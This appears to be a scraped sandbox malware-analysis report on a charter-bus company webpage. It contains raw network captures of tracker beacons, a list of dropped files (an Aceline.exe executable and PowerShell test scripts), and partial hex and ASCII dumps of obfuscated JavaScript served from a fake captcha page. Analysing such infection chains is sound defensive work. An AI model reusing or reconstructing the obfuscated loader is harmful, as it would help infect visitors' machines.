2025-05-21 19:48:02 UTC	573	OUT	GET /getuidj HTTP/1.1 host: secure.adnxs.com sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / origin: https://gogocharters.com sec-fetch-site: cross-site sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active referer: https://gogocharters.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:02 UTC	785	IN	HTTP/1.1 200 OK server: nginx/1.23.4 date: Wed, 21 May 2025 19:48:02 GMT content-type: application/json; charset=utf-8 content-length: 11 cache-control: no-store, no-cache, private pragma: no-cache expires: Sat, 15 Nov 2008 16:00:00 GMT p3p: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" x-xss-protection: 0 access-control-allow-credentials: true access-control-allow-origin: https://gogocharters.com accept-ch: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness an-x-request-uuid: c24ff172-70ee-4f71-b23f-828e88e21ca5 x-proxy-origin: 191.101.61.23; 191.101.61.23; 899.bm-nginx-loadbalancer.mgmt.lax1.adnexus.net; *.adnxs.com
2025-05-21 19:48:02 UTC	11	IN	Data Raw: 7b 22 75 69 64 22 3a 22 30 22 7d Data Ascii: {"uid":"0"}

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:02 UTC	522	OUT	OPTIONS /v3/company/details HTTP/1.1 host: epsilon.6sense.com accept: / access-control-request-method: GET access-control-request-headers: authorization,x-6s-customid origin: https://gogocharters.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-fetch-mode: cors sec-fetch-site: cross-site sec-fetch-dest: empty referer: https://gogocharters.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:02 UTC	404	IN	HTTP/1.1 200 OK date: Wed, 21 May 2025 19:48:02 GMT content-length: 0 timing-allow-origin: https://6sense.com x-6si-region: access-control-expose-headers: X-6si-Region access-control-allow-origin: https://gogocharters.com access-control-allow-credentials: true access-control-max-age: 1800 access-control-allow-methods: OPTIONS,GET access-control-allow-headers: authorization,x-6s-customid

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:03 UTC	1139	OUT	POST /ccm/collect?en=page_view&dl=https%3A%2F%2Fgogocharters.com%2Flexington-charter-bus&scrsrc=www.googletagmanager.com&frm=0&rnd=1559727493.1747856882&dt=Lexington%20Charter%20Bus%20Rental%20%7C%20GOGO%20Charters%20Lexington&auid=2043224603.1747856882&navt=n&npa=0&gtm=45He55k0v78295896za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103130498~103130500~103136993~103136995~103200004~103233427~103252644~103252646~103301114~103301116&tft=1747856881758&tfd=5298&apve=1&apvf=f HTTP/1.1 host: www.google.com content-length: 0 sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / origin: https://gogocharters.com x-client-data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiJo8sBCIWgzQEIxeHOAQ== sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: empty sec-fetch-storage-access: active referer: https://gogocharters.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:03 UTC	561	IN	HTTP/1.1 200 OK expires: Fri, 01 Jan 1990 00:00:00 GMT date: Wed, 21 May 2025 19:48:03 GMT pragma: no-cache cache-control: no-cache, no-store, must-revalidate content-type: text/plain vary: Origin vary: X-Origin vary: Referer server: scaffolding on HTTPServer2 content-length: 0 x-xss-protection: 0 x-frame-options: SAMEORIGIN x-content-type-options: nosniff access-control-allow-origin: https://gogocharters.com access-control-expose-headers: date,vary,vary,vary,server,content-length alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:03 UTC	709	OUT	GET /v3/company/details HTTP/1.1 host: epsilon.6sense.com sec-ch-ua-platform: "Windows" authorization: Token 27ef31915be8823c33720c04e0bd8cade118f5be x-6s-customid: WebTag 85148f45-208d-4e90-9861-30048671efb8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / origin: https://gogocharters.com sec-fetch-site: cross-site sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active referer: https://gogocharters.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:03 UTC	344	IN	HTTP/1.1 200 OK date: Wed, 21 May 2025 19:48:03 GMT content-type: application/json content-length: 1148 timing-allow-origin: https://6sense.com x-6si-region: access-control-expose-headers: X-6si-Region access-control-allow-origin: https://gogocharters.com vary: Origin access-control-allow-credentials: true vary: Accept-Encoding
2025-05-21 19:48:03 UTC	1148	IN	Data Raw: 7b 22 63 6f 6d 70 61 6e 79 22 3a 7b 22 64 6f 6d 61 69 6e 22 3a 22 31 30 31 62 75 69 6c 64 69 6e 67 73 75 70 70 6c 79 2e 63 6f 6d 22 2c 22 6e 61 6d 65 22 3a 22 31 30 31 20 42 75 69 6c 64 69 6e 67 20 53 75 70 70 6c 79 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 6f 72 74 68 65 72 6e 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 73 74 61 74 65 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 2c 22 63 69 74 79 22 3a 22 53 61 63 72 61 6d 65 6e 74 6f 22 2c 22 69 6e 64 75 73 74 72 79 22 3a 22 52 65 74 61 69 6c 20 61 6e 64 20 44 69 73 74 72 69 62 75 74 69 6f 6e 22 2c 22 63 6f 6d 70 61 6e 79 49 64 22 3a 22 30 35 34 38 65 32 32 35 36 32 66 65 61 37 63 22 2c 22 63 6f 75 6e 74 72 79 5f 69 73 6f 5f 63 6f 64 65 22 3a Data Ascii: {"company":{"domain":"101buildingsupply.com","name":"101 Building Supply","region":"Northern America","country":"United States","state":"California","city":"Sacramento","industry":"Retail and Distribution","companyId":"0548e22562fea7c","country_iso_code":

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:04 UTC	372	OUT	GET / HTTP/1.1 Host: c.6sc.co Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-05-21 19:48:04 UTC	299	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 7 Date: Wed, 21 May 2025 19:48:04 GMT Connection: keep-alive Access-Control-Allow-Origin: Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET,POST
2025-05-21 19:48:04 UTC	7	IN	Data Raw: 3c 70 3e 3c 2f 70 3e Data Ascii: <p></p>

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:04 UTC	354	OUT	GET / HTTP/1.1 host: ipv6.6sc.co user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:04 UTC	372	IN	HTTP/1.1 200 OK content-type: text/html content-length: 4 expires: Wed, 21 May 2025 19:48:04 GMT cache-control: max-age=0, no-cache, no-store pragma: no-cache date: Wed, 21 May 2025 19:48:04 GMT server-timing: cdn-cache; desc=HIT server-timing: edge; dur=1 6si-ipv6: null server-timing: ak_p; desc="1747856883856_399898544_1067038717_11_405_163_167_15";dur=1
2025-05-21 19:48:04 UTC	4	IN	Data Raw: 6e 75 6c 6c Data Ascii: null

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://gogocharters.com/lexington-charter-bus

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

AI Reasoning

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

HTML

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Aceline.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Aceline.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Aceline.exe

C:\Users\user\AppData\Local\Temp\VWSECTGEBPBA.zip

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5x22ncaj.brh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tao1ooin.vmo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnept4w3.r24.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfm2vfh5.bva.ps1

Windows Analysis Report
http://gogocharters.com/lexington-charter-bus

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:04 UTC	1160	OUT	GET /v1/beacon/img.gif?token=b30b4e83068a50cbbd396642a2a67178&svisitor=null&visitor=130d9aab-07d7-43a9-86b9-f96832aa1ca7&session=64a22a28-9fdf-436a-88cf-d1865f53886d&event=a_pageload&q=%7B%22pageLoadTime%22%3A%22Wed%2C%2021%20May%202025%2019%3A48%3A00%20GMT%22%7D&isIframe=false&m=%7B%22description%22%3A%22Need%20to%20rent%20a%20charter%20bus%20or%20minibus%20in%20Lexington%3F%20Call%20GOGO%20Charters%20Lexington%20at%20859-215-0605%20to%20get%20your%20free%20charter%20bus%20quote%20today!%22%2C%22keywords%22%3A%22%22%2C%22title%22%3A%22Lexington%20Charter%20Bus%20Rental%20%7C%20GOGO%20Charters%20Lexington%22%7D&cb=&r=&thirdParty=%7B%7D&v2=1&pageURL=https%3A%2F%2Fgogocharters.com%2Flexington-charter-bus&pageViewId=3068eee0-b71d-4b54-8a75-b3fea727bf26&webTagId=85148f45-208d-4e90-9861-30048671efb8&v=1.1.31 HTTP/1.1 host: b.6sc.co user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:04 UTC	260	IN	HTTP/1.1 200 OK content-type: image/gif content-length: 43 x-content-type-options: nosniff accept-ranges: bytes expires: Wed, 21 May 2025 19:48:04 GMT cache-control: max-age=0, no-cache, no-store pragma: no-cache date: Wed, 21 May 2025 19:48:04 GMT
2025-05-21 19:48:04 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 ff ff ff 00 00 00 21 f9 04 01 0a 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b Data Ascii: GIF89a!,L;
2025-05-21 19:48:04 UTC	1318	OUT	GET /v1/beacon/img.gif?token=b30b4e83068a50cbbd396642a2a67178&svisitor=null&visitor=130d9aab-07d7-43a9-86b9-f96832aa1ca7&session=64a22a28-9fdf-436a-88cf-d1865f53886d&event=active_time_track&q=%7B%22currentTime%22%3A%22Wed%2C%2021%20May%202025%2019%3A48%3A01%20GMT%22%2C%22lastTrackTime%22%3A%22Wed%2C%2021%20May%202025%2019%3A48%3A00%20GMT%22%2C%22timeSpent%22%3A%221015%22%2C%22totalTimeSpent%22%3A%221015%22%7D&isIframe=false&m=%7B%22description%22%3A%22Need%20to%20rent%20a%20charter%20bus%20or%20minibus%20in%20Lexington%3F%20Call%20GOGO%20Charters%20Lexington%20at%20859-215-0605%20to%20get%20your%20free%20charter%20bus%20quote%20today!%22%2C%22keywords%22%3A%22%22%2C%22title%22%3A%22Lexington%20Charter%20Bus%20Rental%20%7C%20GOGO%20Charters%20Lexington%22%7D&cb=&r=&thirdParty=%7B%7D&v2=1&pageURL=https%3A%2F%2Fgogocharters.com%2Flexington-charter-bus&pageViewId=3068eee0-b71d-4b54-8a75-b3fea727bf26&an_uid=0&webTagId=85148f45-208d-4e90-9861-30048671efb8&v=1.1.31 HTTP/1.1 host: b.6sc.co user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:04 UTC	260	IN	HTTP/1.1 200 OK content-type: image/gif content-length: 43 x-content-type-options: nosniff accept-ranges: bytes expires: Wed, 21 May 2025 19:48:04 GMT cache-control: max-age=0, no-cache, no-store pragma: no-cache date: Wed, 21 May 2025 19:48:04 GMT
2025-05-21 19:48:04 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 ff ff ff 00 00 00 21 f9 04 01 0a 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b Data Ascii: GIF89a!,L;
2025-05-21 19:48:04 UTC	1460	OUT	GET /v1/beacon/img.gif?token=b30b4e83068a50cbbd396642a2a67178&svisitor=null&visitor=130d9aab-07d7-43a9-86b9-f96832aa1ca7&session=64a22a28-9fdf-436a-88cf-d1865f53886d&event=ni%3AasyncSettingsAudit&q=%7B%22settings%22%3A%22%5B%7B%5C%22name%5C%22%3A%5C%22setToken%5C%22%2C%5C%22value%5C%22%3A%5C%22b30b4e83068a50cbbd396642a2a67178%5C%22%2C%5C%22dateTime%5C%22%3A%5C%22Wed%2C%2021%20May%202025%2019%3A48%3A00%20GMT%5C%22%2C%5C%22timeSincePageLoad%5C%22%3A%5C%220%5C%22%7D%2C%7B%5C%22name%5C%22%3A%5C%22disableCookies%5C%22%2C%5C%22value%5C%22%3A%5C%22false%5C%22%2C%5C%22dateTime%5C%22%3A%5C%22Wed%2C%2021%20May%202025%2019%3A48%3A00%20GMT%5C%22%2C%5C%22timeSincePageLoad%5C%22%3A%5C%220%5C%22%7D%2C%7B%5C%22name%5C%22%3A%5C%22setEpsilonKey%5C%22%2C%5C%22value%5C%22%3A%5C%2227ef31915be8823c33720c04e0bd8cade118f5be%5C%22%2C%5C%22dateTime%5C%22%3A%5C%22Wed%2C%2021%20May%202025%2019%3A48%3A00%20GMT%5C%22%2C%5C%22timeSincePageLoad%5C%22%3A%5C%220%5C%22%7D%2C%7B%5C%22name%5C%22%3A%5C%22enableIPv6Ping%5C%22%2C%5C%22value%5C%22%3 [TRUNCATED]
2025-05-21 19:48:04 UTC	1460	OUT	Data Raw: 32 32 25 32 43 25 35 43 25 32 32 76 61 6c 75 65 25 35 43 25 32 32 25 33 41 25 35 43 25 32 32 74 72 75 65 25 35 43 25 32 32 25 32 43 25 35 43 25 32 32 64 61 74 65 54 69 6d 65 25 35 43 25 32 32 25 33 41 25 35 43 25 32 32 57 65 64 25 32 43 25 32 30 32 31 25 32 30 4d 61 79 25 32 30 32 30 32 35 25 32 30 31 39 25 33 41 34 38 25 33 41 30 30 25 32 30 47 4d 54 25 35 43 25 32 32 25 32 43 25 35 43 25 32 32 74 69 6d 65 53 69 6e 63 65 50 61 67 65 4c 6f 61 64 25 35 43 25 32 32 25 33 41 25 35 43 25 32 32 30 25 35 43 25 32 32 25 37 44 25 32 43 25 37 42 25 35 43 25 32 32 6e 61 6d 65 25 35 43 25 32 32 25 33 41 25 35 43 25 32 32 73 65 74 57 68 69 74 65 4c 69 73 74 46 69 65 6c 64 73 25 35 43 25 32 32 25 32 43 25 35 43 25 32 32 76 61 6c 75 65 25 35 43 25 32 32 25 33 41 25 35 Data Ascii: 22%2C%5C%22value%5C%22%3A%5C%22true%5C%22%2C%5C%22dateTime%5C%22%3A%5C%22Wed%2C%2021%20May%202025%2019%3A48%3A00%20GMT%5C%22%2C%5C%22timeSincePageLoad%5C%22%3A%5C%220%5C%22%7D%2C%7B%5C%22name%5C%22%3A%5C%22setWhiteListFields%5C%22%2C%5C%22value%5C%22%3A%5
2025-05-21 19:48:04 UTC	1261	OUT	Data Raw: 64 61 74 65 54 69 6d 65 25 35 43 25 32 32 25 33 41 25 35 43 25 32 32 57 65 64 25 32 43 25 32 30 32 31 25 32 30 4d 61 79 25 32 30 32 30 32 35 25 32 30 31 39 25 33 41 34 38 25 33 41 30 30 25 32 30 47 4d 54 25 35 43 25 32 32 25 32 43 25 35 43 25 32 32 74 69 6d 65 53 69 6e 63 65 50 61 67 65 4c 6f 61 64 25 35 43 25 32 32 25 33 41 25 35 43 25 32 32 30 25 35 43 25 32 32 25 37 44 25 32 43 25 37 42 25 35 43 25 32 32 6e 61 6d 65 25 35 43 25 32 32 25 33 41 25 35 43 25 32 32 65 6e 61 62 6c 65 43 6f 6d 70 61 6e 79 44 65 74 61 69 6c 73 25 35 43 25 32 32 25 32 43 25 35 43 25 32 32 76 61 6c 75 65 25 35 43 25 32 32 25 33 41 25 35 43 25 32 32 74 72 75 65 25 35 43 25 32 32 25 32 43 25 35 43 25 32 32 64 61 74 65 54 69 6d 65 25 35 43 25 32 32 25 33 41 25 35 43 25 32 32 57 65 Data Ascii: dateTime%5C%22%3A%5C%22Wed%2C%2021%20May%202025%2019%3A48%3A00%20GMT%5C%22%2C%5C%22timeSincePageLoad%5C%22%3A%5C%220%5C%22%7D%2C%7B%5C%22name%5C%22%3A%5C%22enableCompanyDetails%5C%22%2C%5C%22value%5C%22%3A%5C%22true%5C%22%2C%5C%22dateTime%5C%22%3A%5C%22We
2025-05-21 19:48:04 UTC	260	IN	HTTP/1.1 200 OK content-type: image/gif content-length: 43 x-content-type-options: nosniff accept-ranges: bytes expires: Wed, 21 May 2025 19:48:04 GMT cache-control: max-age=0, no-cache, no-store pragma: no-cache date: Wed, 21 May 2025 19:48:04 GMT
2025-05-21 19:48:04 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 ff ff ff 00 00 00 21 f9 04 01 0a 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b Data Ascii: GIF89a!,L;
2025-05-21 19:48:05 UTC	1318	OUT	GET /v1/beacon/img.gif?token=b30b4e83068a50cbbd396642a2a67178&svisitor=null&visitor=130d9aab-07d7-43a9-86b9-f96832aa1ca7&session=64a22a28-9fdf-436a-88cf-d1865f53886d&event=active_time_track&q=%7B%22currentTime%22%3A%22Wed%2C%2021%20May%202025%2019%3A48%3A02%20GMT%22%2C%22lastTrackTime%22%3A%22Wed%2C%2021%20May%202025%2019%3A48%3A01%20GMT%22%2C%22timeSpent%22%3A%221032%22%2C%22totalTimeSpent%22%3A%222047%22%7D&isIframe=false&m=%7B%22description%22%3A%22Need%20to%20rent%20a%20charter%20bus%20or%20minibus%20in%20Lexington%3F%20Call%20GOGO%20Charters%20Lexington%20at%20859-215-0605%20to%20get%20your%20free%20charter%20bus%20quote%20today!%22%2C%22keywords%22%3A%22%22%2C%22title%22%3A%22Lexington%20Charter%20Bus%20Rental%20%7C%20GOGO%20Charters%20Lexington%22%7D&cb=&r=&thirdParty=%7B%7D&v2=1&pageURL=https%3A%2F%2Fgogocharters.com%2Flexington-charter-bus&pageViewId=3068eee0-b71d-4b54-8a75-b3fea727bf26&an_uid=0&webTagId=85148f45-208d-4e90-9861-30048671efb8&v=1.1.31 HTTP/1.1 host: b.6sc.co user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:05 UTC	260	IN	HTTP/1.1 200 OK content-type: image/gif content-length: 43 x-content-type-options: nosniff accept-ranges: bytes expires: Wed, 21 May 2025 19:48:05 GMT cache-control: max-age=0, no-cache, no-store pragma: no-cache date: Wed, 21 May 2025 19:48:05 GMT
2025-05-21 19:48:05 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 ff ff ff 00 00 00 21 f9 04 01 0a 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b Data Ascii: GIF89a!,L;

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:04 UTC	674	OUT	GET /captcha/ HTTP/1.1 host: ia-robotics.com sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-dest: document referer: https://gogocharters.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=0, i
2025-05-21 19:48:04 UTC	374	IN	HTTP/1.1 200 OK date: Wed, 21 May 2025 19:48:03 GMT server: nginx/1.25.5 content-type: text/html; charset=UTF-8 cache-control: max-age=7200 expires: Wed, 21 May 2025 21:48:03 GMT vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== x-endurance-cache-level: 2 x-nginx-cache: WordPress x-server-cache: true x-proxy-cache: MISS content-length: 126735
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 3c 73 63 72 69 70 74 3e 3b 46 75 6e 63 74 69 6f 6e 28 22 27 6b 32 73 7b 78 61 7b 38 65 78 7b 63 25 2e 34 5e 73 79 36 65 7e 68 26 5b 37 2d 6f 23 74 7e 76 76 63 6e 31 6e 2c 36 6e 67 78 5f 77 7d 71 69 37 2b 36 39 5f 79 6e 71 69 69 7d 40 6d 7a 26 7e 65 70 69 71 31 23 7e 6f 7a 70 32 2c 65 2a 35 73 65 65 69 25 65 2d 21 72 6a 7b 68 35 5d 79 34 6d 79 2b 23 38 72 2e 66 23 21 6d 6f 6d 6d 2e 78 40 6c 33 67 5f 75 6e 79 7a 76 25 26 68 6b 74 74 79 5d 37 5d 5b 7a 6b 35 67 5e 36 6d 2b 7d 72 79 73 6a 66 65 5e 21 7b 35 68 2c 75 2b 37 23 63 72 68 7e 2a 2a 78 5f 72 2e 2a 40 6c 5b 25 2e 76 25 38 32 26 5b 37 33 2b 23 2a 38 5e 21 6b 71 5e 31 40 61 77 7a 2d 21 23 2d 34 35 33 70 33 23 2a 65 39 5f 77 5e 34 63 66 32 65 65 5f 5e 38 36 34 6a 72 26 73 68 26 26 61 39 32 2e 78 5b 2a 65 Data Ascii: <script>;Function("'k2s{xa{8ex{c%.4^sy6e~h&[7-o#t~vvcn1n,6ngx_w}qi7+69_ynqii}@mz&~epiq1#~ozp2,e5seei%e-!rj{h5]y4my+#8r.f#!momm.x@l3g_unyzv%&hktty]7][zk5g^6m+}rysjfe^!{5h,u+7#crh~x_r.@l[%.v%82&[73+#8^!kq^1@awz-!#-453p3#e9_w^4cf2ee_^864jr&sh&&a92.x[*e
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 5c 5c 22 2b 5f 49 4c 63 36 61 72 73 65 74 29 3b 72 65 74 75 72 6e 20 5f 59 35 33 35 33 3b 7d 72 65 74 75 72 6e 20 21 5f 59 35 33 35 33 3b 7d 29 28 66 61 6c 73 65 29 3b e2 80 8b 5f 4f 57 4a 73 57 2e 5f 4b 56 4f 39 34 46 3d 5c 5c 5c 22 4e 48 4a 49 5a 50 42 50 54 4d 47 53 57 53 50 4d 4b 52 52 53 50 5a 53 56 48 52 45 4f 59 52 45 56 54 4b 4c 54 50 54 55 4b 49 4e 51 4a 49 56 4c 41 48 55 50 5a 54 55 46 49 5a 52 59 49 46 47 56 5c 5c 5c 22 e2 80 8b 28 66 75 6e 63 74 69 6f 6e 28 5f 42 52 35 6d 38 39 49 41 2c 5f 4e 33 31 72 2c 5f 49 73 69 6a 2c 5f 59 67 58 52 62 62 58 38 29 7b 5f 42 52 35 6d 38 39 49 41 3d 74 68 69 73 3b 5f 4e 33 31 72 3d 5c 5c 5c 22 5c 5c 5c 5c 31 36 32 5c 5c 5c 5c 31 34 35 5c 5c 5c 5c 31 36 30 5c 5c 5c 5c 31 35 34 5c 5c 5c 5c 31 34 31 5c 5c 5c 5c Data Ascii: \\"+_ILc6arset);return _Y5353;}return !_Y5353;})(false);_OWJsW._KVO94F=\\\"NHJIZPBPTMGSWSPMKRRSPZSVHREOYREVTKLTPTUKINQJIVLAHUPZTUFIZRYIFGV\\\"(function(_BR5m89IA,_N31r,_Isij,_YgXRbbX8){_BR5m89IA=this;_N31r=\\\"\\\\162\\\\145\\\\160\\\\154\\\\141\\\\
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 34 36 61 38 66 37 34 37 37 37 64 33 35 33 61 64 2c 41 35 30 41 39 21 36 35 32 59 41 4c 34 31 36 43 33 3a 39 36 64 62 62 3a 46 36 39 59 41 4d 66 37 39 63 35 32 32 37 38 39 64 65 37 38 33 63 66 33 31 38 30 64 30 7b 30 32 33 39 30 58 37 33 58 39 35 4c 38 38 62 44 46 33 32 38 63 62 64 58 30 34 64 61 34 66 62 35 32 41 39 47 30 35 37 41 58 32 31 61 66 5f 37 36 33 41 44 46 44 32 44 35 30 41 37 31 34 36 59 43 32 31 39 37 30 63 37 31 65 37 35 63 63 32 33 37 41 64 31 37 30 44 33 32 33 37 39 38 34 33 36 31 63 38 39 58 30 33 37 38 58 65 35 33 43 39 33 58 41 34 31 39 38 65 66 34 36 39 64 46 34 34 62 61 32 33 66 39 46 46 35 35 32 36 32 66 32 34 34 61 37 46 41 35 34 59 38 44 30 28 44 59 37 31 34 36 35 59 44 7e 35 36 34 37 62 31 41 36 35 37 46 43 41 32 58 62 39 31 66 37 Data Ascii: 46a8f74777d353ad,A50A9!652YAL416C3:96dbb:F69YAMf79c522789de783cf3180d0{02390X73X95L88bDF328cbdX04da4fb52A9G057AX21af_763ADFD2D50A7146YC21970c71e75cc237Ad170D3237984361c89X0378Xe53C93XA4198ef469dF44ba23f9FF55262f244a7FA54Y8D0(DY71465YD~5647b1A657FCA2Xb91f7
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 31 33 36 41 63 31 31 38 36 46 63 36 31 44 37 34 63 62 32 32 37 39 64 30 32 61 63 30 31 58 37 33 43 32 32 38 37 32 64 35 32 34 33 36 58 38 63 65 33 59 39 32 65 39 34 30 39 37 58 58 34 35 39 63 46 33 34 41 41 31 66 38 34 66 41 36 66 64 35 34 46 31 35 31 61 37 2c 34 31 34 59 31 66 65 36 36 41 38 64 34 31 31 37 62 64 37 36 36 63 35 44 46 7c 35 37 32 43 39 32 30 37 37 43 58 32 35 37 63 44 33 32 41 38 31 64 38 32 46 65 33 43 37 31 58 38 62 58 32 33 39 39 30 65 37 33 65 39 35 65 63 34 33 39 41 46 31 34 38 61 64 34 39 39 61 65 35 34 37 39 58 65 38 35 34 39 63 48 36 35 39 35 63 47 58 66 34 36 31 62 38 2e 66 36 36 59 44 31 34 36 62 43 32 31 39 37 30 43 37 31 58 37 35 43 43 32 33 37 41 31 37 37 37 63 64 32 61 33 61 44 37 32 34 38 63 63 65 66 61 33 37 41 30 66 39 38 Data Ascii: 